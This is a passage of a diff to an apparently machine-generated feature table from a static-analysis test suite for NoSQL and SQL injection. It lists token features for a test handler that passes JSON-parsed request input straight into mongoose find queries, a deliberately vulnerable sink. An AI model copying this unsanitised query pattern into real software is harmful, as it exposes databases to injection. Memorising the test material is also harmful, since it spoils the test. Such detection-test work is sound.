contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | exceptional return of anonymous function | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | exceptional return of anonymous function | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | return of anonymous function | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | return of anonymous function | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:19:24:1 | return of anonymous function | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:20:20:22 | req | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:25:20:27 | res | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:25:20:27 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:25:20:27 | res | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:25:20:27 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:20:25:20:27 | res | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:7 | v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:7 | v | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:7 | v | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:7 | v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:7 | v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v = JSO ... body.x) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v = JSO ... body.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v = JSO ... body.x) | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v = JSO ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:7:21:32 | v = JSO ... body.x) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:14 | JSON | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:14 | JSON | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:14 | JSON | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:14 | JSON | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:14 | JSON | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:20 | JSON.parse | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:20 | JSON.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:20 | JSON.parse | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:20 | JSON.parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:20 | JSON.parse | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | exceptional return of JSON.pa ... body.x) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | exceptional return of JSON.pa ... body.x) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | exceptional return of JSON.pa ... body.x) | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | exceptional return of JSON.pa ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:11:21:32 | exceptional return of JSON.pa ... body.x) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:16:21:20 | parse | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:16:21:20 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:16:21:20 | parse | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:16:21:20 | parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:16:21:20 | parse | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:24 | req | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:24 | req | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:24 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:24 | req | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:29 | req.body | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:29 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:29 | req.body | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:29 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:29 | req.body | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:31 | req.body.x | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:31 | req.body.x | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:31 | req.body.x | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | @@ -76,6 +560,51 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:31 | req.body.x | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:31 | req.body.x | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:22:21:31 | req.body.x | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:26:21:29 | body | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:26:21:29 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:26:21:29 | body | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:26:21:29 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:26:21:29 | body | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:31:21:31 | x | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:31:21:31 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:31:21:31 | x | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:31:21:31 | x | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:21:31:21:31 | x | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:18 | getMongooseModel | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:18 | getMongooseModel | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:18 | getMongooseModel | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:18 | getMongooseModel | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:18 | getMongooseModel | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | exceptional return of getMongooseModel() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | exceptional return of getMongooseModel() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | exceptional return of getMongooseModel() | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | exceptional return of getMongooseModel() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | exceptional return of getMongooseModel() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | getMongooseModel() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | getMongooseModel() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | getMongooseModel() | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | getMongooseModel() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:20 | getMongooseModel() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:25 | getMong ... ().find | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:25 | getMong ... ().find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:25 | getMong ... ().find | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:25 | getMong ... ().find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:25 | getMong ... ().find | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | exceptional return of getMong ... d: v }) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | exceptional return of getMong ... d: v }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | exceptional return of getMong ... d: v }) | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | exceptional return of getMong ... d: v }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | exceptional return of getMong ... d: v }) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | getMong ... d: v }) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | getMong ... d: v }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | getMong ... d: v }) | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | getMong ... d: v }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:3:22:36 | getMong ... d: v }) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:22:22:25 | find | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:22:22:25 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:22:22:25 | find | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:22:22:25 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:22:22:25 | find | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:27:22:35 | { id: v } | CalleeFlexibleAccessPath | getMongooseModel().find | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:27:22:35 | { id: v } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:27:22:35 | { id: v } | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | @@ -83,6 +612,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:27:22:35 | { id: v } | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:27:22:35 | { id: v } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:27:22:35 | { id: v } | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:30 | id | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:30 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:30 | id | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:30 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:30 | id | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:29:22:33 | id: v | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:33:22:33 | v | CalleeFlexibleAccessPath | getMongooseModel().find | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:33:22:33 | v | InputAccessPathFromCallee | 0.id | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:33:22:33 | v | InputArgumentIndex | 0 | @@ -92,6 +636,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:33:22:33 | v | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:33:22:33 | v | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:22:33:22:33 | v | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:18 | getMongooseQuery | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:18 | getMongooseQuery | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:18 | getMongooseQuery | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:18 | getMongooseQuery | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:18 | getMongooseQuery | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | exceptional return of getMongooseQuery() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | exceptional return of getMongooseQuery() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | exceptional return of getMongooseQuery() | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | exceptional return of getMongooseQuery() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | exceptional return of getMongooseQuery() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | getMongooseQuery() | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | getMongooseQuery() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | getMongooseQuery() | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | getMongooseQuery() | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:20 | getMongooseQuery() | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:25 | getMong ... ().find | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:25 | getMong ... ().find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:25 | getMong ... ().find | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:25 | getMong ... ().find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:25 | getMong ... ().find | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | exceptional return of getMong ... d: v }) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | exceptional return of getMong ... d: v }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | exceptional return of getMong ... d: v }) | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | exceptional return of getMong ... d: v }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | exceptional return of getMong ... d: v }) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | getMong ... d: v }) | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | getMong ... d: v }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | getMong ... d: v }) | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | getMong ... d: v }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:3:23:36 | getMong ... d: v }) | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:22:23:25 | find | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:22:23:25 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:22:23:25 | find | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:22:23:25 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:22:23:25 | find | fileImports | body-parser express mongodb mongoose | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:27:23:35 | { id: v } | CalleeFlexibleAccessPath | getMongooseQuery().find | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:27:23:35 | { id: v } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:27:23:35 | { id: v } | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | @@ -99,6 +678,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:27:23:35 | { id: v } | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:27:23:35 | { id: v } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:27:23:35 | { id: v } | fileImports | body-parser express mongodb mongoose | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:30 | id | contextFunctionInterfaces | getCollection()\ngetMongooseModel()\ngetMongooseQuery() | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:30 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/typed/typedClient.ts:23:29:23:30 | id | enclosingFunctionBody | req res v JSON parse req body x getMongooseModel find id v getMongooseQuery find id v | +| 